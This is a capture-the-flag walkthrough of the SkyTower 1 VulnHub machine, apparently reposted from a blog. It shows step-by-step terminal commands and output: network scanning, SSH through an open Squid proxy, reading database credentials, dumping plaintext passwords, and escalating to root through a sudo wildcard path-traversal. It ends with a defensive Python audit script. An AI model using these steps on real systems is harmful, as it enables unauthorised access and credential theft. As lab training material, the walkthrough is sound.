Walkthrough-SkyTower 1
0x01 Environment
Target VM:
https://www.vulnhub.com/entry/skytower-1,96/
0x02 Process
1. Information gathering
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# netdiscover -r 192.168.60.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
16 Captured ARP Req/Rep packets, from 7 hosts. Total size: 960
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.60.95 08:00:27:54:4a:37 1 60 PCS Systemtechnik GmbH
Open ports
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# nmap --min-rate 10000 -p- 192.168.60.95
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-16 03:00 EDT
Nmap scan report for SkyTower (192.168.60.95)
Host is up (0.000080s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
3128/tcp open squid-http
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds
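2. Approach
Browsing to port 80 shows a login form.
Tried SQL injection; after bypassing the login check, the login succeeded.
The page then displays a hint: an account and password, to be used for SSH login.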
john:hereisjohn
Logging in over SSH directly does not work.
Port 3128 from the scan turns out to be a Squid proxy server, so the SSH login was attempted through the proxy.
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# vim /etc/proxychains4.conf
http 192.168.60.95 3128
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# proxychains ssh john@192.168.60.95
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 192.168.60.95:3128 ... 192.168.60.95:22 ... OK
john@192.168.60.95's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 16 03:29:37 2023 from 192.168.60.95
Funds have been withdrawn
Connection to 192.168.60.95 closed.
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# proxychains ssh john@192.168.60.95 "id"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 192.168.60.95:3128 ... 192.168.60.95:22 ... OK
john@192.168.60.95's password:
uid=1000(john) gid=1000(john) groups=1000(john)
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# proxychains ssh john@192.168.60.95 "ls -al"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 192.168.60.95:3128 ... 192.168.60.95:22 ... OK
john@192.168.60.95's password:
total 24
drwx------ 2 john john 4096 Jun 20 2014 .
drwxr-xr-x 5 root root 4096 Jun 20 2014 ..
-rw------- 1 john john 7 Jun 20 2014 .bash_history
-rw-r--r-- 1 john john 220 Jun 20 2014 .bash_logout
-rw-r--r-- 1 john john 3437 Jun 20 2014 .bashrc
-rw-r--r-- 1 john john 675 Jun 20 2014 .profile
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# proxychains ssh john@192.168.60.95 "mv .bashrc .bashrc.bak"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 192.168.60.95:3128 ... 192.168.60.95:22 ... OK
john@192.168.60.95's password:
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# proxychains ssh john@192.168.60.95
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 192.168.60.95:3128 ... 192.168.60.95:22 ... OK
john@192.168.60.95's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 16 03:29:55 2023 from 192.168.60.95
john@SkyTower:~$
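Once SSH works through the proxy, the session is closed immediately after login, but commands can still be executed over ssh. After moving the session configuration (.bashrc) out of the way, a full shell is obtained.
Searching through the files reveals the account and password in the database configuration.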
john@SkyTower:~$ ls /var
backups cache lib local lock log mail opt run spool tmp www
john@SkyTower:~$ ls /var/www
background2.jpg background.jpg index.html login.php
john@SkyTower:~$ cat /var/www/login.php
<?php
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');
if($db->connect_errno > 0){
die('Unable to connect to database [' . $db->connect_error . ']');
}
Logging in to the database reveals the other accounts' passwords; log in to the sara account.
john@SkyTower:~$ mysql -uroot -proot
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 63
Server version: 5.5.35-0+wheezy1 (Debian)
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| SkyTech |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
mysql> use SkyTech;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-------------------+
| Tables_in_SkyTech |
+-------------------+
| login |
+-------------------+
1 row in set (0.00 sec)
mysql> select * from login;
+----+---------------------+--------------+
| id | email | password |
+----+---------------------+--------------+
| 1 | john@skytech.com | hereisjohn |
| 2 | sara@skytech.com | ihatethisjob |
| 3 | william@skytech.com | senseable |
+----+---------------------+--------------+
3 rows in set (0.00 sec)
mysql> exit
Bye
john@SkyTower:~$ su sara
Password:
Funds have been withdrawn
john@SkyTower:~$ exit
logout
Connection to 192.168.60.95 closed.
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# proxychains ssh sara@192.168.60.95 "mv .bashrc .bashrc.bak"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 192.168.60.95:3128 ... 192.168.60.95:22 ... OK
sara@192.168.60.95's password:
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# proxychains ssh sara@192.168.60.95
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 192.168.60.95:3128 ... 192.168.60.95:22 ... OK
sara@192.168.60.95's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 20 08:19:23 2014 from localhost
sara@SkyTower:~$
sara has usable sudo commands, and their rules have a path wildcard problem, so flag.txt can be read, which reveals the root password.
sara@SkyTower:~$ sudo -l
Matching Defaults entries for sara on this host:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sara may run the following commands on this host:
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
sara@SkyTower:~$ sudo ls /accounts/../root -al
total 36
drwx------ 4 root root 4096 Jun 20 2014 .
drwxr-xr-x 24 root root 4096 Jun 20 2014 ..
drwx------ 2 root root 4096 Jun 20 2014 .aptitude
-rw------- 1 root root 204 Jun 20 2014 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rwx------ 1 root root 69 Jun 20 2014 flag.txt
-rw------- 1 root root 268 Jun 20 2014 .mysql_history
-rw-r--r-- 1 root root 140 Nov 19 2007 .profile
drwx------ 2 root root 4096 Jun 20 2014 .ssh
sara@SkyTower:~$ sudo cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
sara@SkyTower:~$ su root
Password:
root@SkyTower:/home/sara# id
uid=0(root) gid=0(root) groups=0(root)
root@SkyTower:/home/sara#
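An added example (not part of the original write-up): a small Python audit of the `sudo -l` rule line shown above, illustrating why the argument pattern `/accounts/*` also admits `/accounts/../root/flag.txt`. It approximates sudo's argument matching with Python's `fnmatch`, where `*` also matches `/`; the function names and the simplified rule parsing are assumptions of this example.

```python
import fnmatch
import posixpath
import re

# Constructed sample: the rule line copied from the `sudo -l` output above.
SUDO_L_LINE = "(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*"

def parse_rules(line):
    """Split one `sudo -l` rule line into (command, argument-pattern) pairs.
    Simplified: assumes no escaped commas inside the arguments."""
    rules = []
    for entry in line.split(","):
        # Drop the "(runas)" prefix and any tag such as NOPASSWD:
        spec = re.sub(r"^\s*\([^)]*\)\s*(?:[A-Z_]+:\s*)*", "", entry).strip()
        command, _, args = spec.partition(" ")
        rules.append((command, args.strip()))
    return rules

def sudo_allows(pattern, argument):
    """Approximation of sudo's argument matching: the arguments are one
    string and '*' matches any character, including '/' and spaces."""
    return fnmatch.fnmatchcase(argument, pattern)

def escapes_prefix(pattern, argument):
    """True if the argument matches the rule but resolves outside its directory."""
    base = posixpath.normpath(pattern.split("*", 1)[0])
    resolved = posixpath.normpath(argument)
    inside = resolved == base or resolved.startswith(base + "/")
    return sudo_allows(pattern, argument) and not inside

def audit(line, probe="../root/flag.txt"):
    """Return rules whose wildcard argument admits a path outside the prefix.
    The default probe is the relative path used in the session above."""
    findings = []
    for command, args in parse_rules(line):
        if "*" not in args:
            continue
        candidate = args.split("*", 1)[0] + probe
        if escapes_prefix(args, candidate):
            findings.append((command, args, posixpath.normpath(candidate)))
    return findings

if __name__ == "__main__":
    for command, args, resolved in audit(SUDO_L_LINE):
        print(f"{command} {args}: wildcard also matches a path resolving to {resolved}")
```

Both rules are flagged. The usual correction is to list the permitted files explicitly in sudoers, or to route the command through a wrapper that canonicalises the path and rejects anything outside /accounts.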
This article is from cnblogs (博客园), author: Jarwu. When reposting, please cite the original link: https://www.cnblogs.com/jarwu/p/17405912.html